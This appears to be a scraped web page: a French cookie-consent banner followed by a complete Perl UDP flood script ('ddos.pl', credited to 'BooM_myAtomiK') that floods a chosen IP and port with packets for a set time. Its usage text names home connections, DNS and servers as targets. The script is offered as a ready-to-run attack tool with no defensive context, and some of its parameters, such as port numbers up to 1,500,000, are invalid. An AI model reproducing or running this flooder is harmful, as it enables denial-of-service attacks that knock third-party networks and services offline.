Nos partenaires et nous-mêmes utilisons différentes technologies, telles que les cookies, pour personnaliser les contenus et les publicités, proposer des fonctionnalités sur les réseaux sociaux et analyser le trafic. Merci de cliquer sur le bouton ci-dessous pour donner votre accord. Vous pouvez changer d’avis et modifier vos choix à tout moment. Informations RGPD
#!/usr/bin/perl ## # PwNy<---- ## use Socket; use strict; if ($#ARGV != 3) { print "\n"; print "[!] SSDP BY BooM_myAtomiK [!] \n\n"; print "ddos.pl <ip> <port> <size> <time>\n\n"; print " port=0: use random ports\n"; print " size=1: <1> best powerful \n"; print " time=0: unlimited flood\n\n"; print " Exemple: perl ddos.pl 123.12.123.123 80 1 900"; print "\n\n"; print " ► PORT INFO ◄ \n\n"; print " 21 = VPS, SERVER \n"; print " 22 = SFTP \n"; print " 53 = DNS ( home connection ) \n"; print " 80 = Home connection, server, website, ... \n"; print "\n"; exit(1); } my ($ip,$port,$size,$time) = @ARGV; my ($iaddr,$endtime,$psize,$pport); $iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n"; $endtime = time() + ($time ? $time : 100); socket(flood, PF_INET, SOCK_DGRAM, 17); print <<EOTEXT; DDOS Launched ! EOTEXT print "IP CIBLE: $ip " . "SUR LE PORT: " . ($port ? $port : "random") . " PUISSANCE D'ATTAQUE: " . ($size ? "$size BYTE(S)" : "PUISSANCE EXTRÊME") . " " . ($time ? " POUR $time SECONDE(S)" : "") . "\n"; print "STOPPER L'ATTAQUE: CTRL + C" unless $time; for (;time() <= $endtime;) { $psize = $size ? $size : int(rand(1500000-64)+64) ; $pport = $port ? $port : int(rand(1500000))+1; send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}